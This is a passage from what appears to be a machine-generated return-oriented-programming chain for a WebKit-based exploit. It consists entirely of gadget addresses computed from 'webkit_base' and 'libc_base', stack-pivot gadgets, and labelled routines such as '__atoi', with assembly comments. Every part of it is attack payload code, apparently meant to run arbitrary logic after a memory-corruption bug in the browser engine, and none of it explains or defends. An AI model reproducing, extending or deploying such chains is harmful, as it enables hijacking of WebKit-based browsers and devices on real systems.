webkit_base+3236123 //pop r9
]);
//L2922:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2923:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2924:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+184352, //L2927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+184368, //L2928
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+184320, //L2925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2925:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2926:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L2927:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2928:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+184440, //L2929
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2929:
db([0, 0]); // 0x0
//L2881:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+184504, //L2932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L2931:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2932:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+184584, //L2934
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L2933:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2934:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+184712, //L2935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+184744, //L2937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+184728, //L2936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2935:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2936:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2937:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+184848, //L2938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+184864, //L2939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2938:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2939:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+184984, //L2940
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+184968, //L2941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2941:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2940:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+185072, //L2943
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+185056, //L2942
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2942:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2943:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+185176, //L2944
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+185192, //L2945
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2944:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2945:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+185312, //L2946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+185296, //L2947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2947:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2946:
db([0, 0]); // 0x0
//__atoi:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+185384, //L2949
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2949:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+185448, //L2951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2951:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2952:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2954:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+185576, //L2956
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2955:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2956:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+185632, //L2958
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2958:
db([0, 0]); // 0x0
//L2957:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+185680, //L2960
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2960:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2962:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+185800, //L2965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+185784, //L2963
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2963:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2965:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+185880, //L2966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+185896, //L2967
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2966:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2967:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+185976, //L2968
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+185992, //L2969
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2968:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2969:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+186152, //L2973
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+186120, //L2971
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+186136, //L2972
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2970:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2971:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2972:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2973:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+186208, //L2975
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2975:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+186336, //L2977
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+186352, //L2978
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+186320, //L2976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2976:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2977:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2978:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+186512, //L2982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+186480, //L2980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+186496, //L2981
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2979:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2980:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2981:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2982:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+186568, //L2984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2984:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+186696, //L2986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+186712, //L2987
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+186680, //L2985
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2985:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2986:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2987:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+186872, //L2991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+186840, //L2989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+186856, //L2990
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2988:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2989:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2990:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2991:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+186928, //L2993
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2993:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+187056, //L2995
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+187072, //L2996
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+187040, //L2994
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2994:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2995:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2996:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+187152, //L2997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+187168, //L2998
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2997:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2998:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+187264, //L3000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+187248, //L2999
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2999:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3000:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L3002:
ropchain+187368, //L3001
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+180736, //__is_digit
//L3001:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+187496, //L3005
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+187480, //L3004
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3003:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3004:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3005:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+187552, //L3007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3007:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+187680, //L3009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+187696, //L3010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+187664, //L3008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3008:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3009:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3010:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+187808, //L3012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+187856, //L3015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+187824, //L3013
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3012:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3013:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3014:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3015:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+187968, //L3016+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+187960, //L3016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3016:
db([0, 0]); // 0x0
set_gadgets([
ropchain+187984, //L3016+24
ropchain+191512, //L3011
libc_base+764760, //pop rsi
ropchain+188024, //L3017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3017:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3019:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+188144, //L3022
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+188128, //L3020
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3020:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3022:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+188320, //L3025
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+188336, //L3026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+188288, //L3023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+188304, //L3024
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3023:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3024:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3025:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3026:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+188432, //L3028
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+188416, //L3027
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3027:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3028:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3029:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L3030:
db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+10973692, //imul rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+188616, //L3031
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3031:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3033:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+188736, //L3036
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+188720, //L3034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3034:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3036:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+188816, //L3037
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+188832, //L3038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3037:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3038:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+188976, //L3041
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+188944, //L3039
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+188960, //L3040
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3039:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3040:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3041:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+189064, //L3043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3042:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L3043:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+189152, //L3044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3044:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3046:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+189272, //L3049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+189256, //L3047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3047:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3049:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+189360, //L3050
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+189376, //L3052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L3050:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3052:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+189432, //L3053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3053:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+189624, //L3056
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+189640, //L3057
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+189608, //L3055
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3055:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3056:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3057:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+189800, //L3061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+189768, //L3059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+189784, //L3060
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3058:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3059:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3060:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3061:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+189856, //L3063
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3063:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+189984, //L3065
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+190000, //L3066
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+189968, //L3064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3064:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3065:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3066:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+190160, //L3070
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+190128, //L3068
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+190144, //L3069
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3067:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3068:
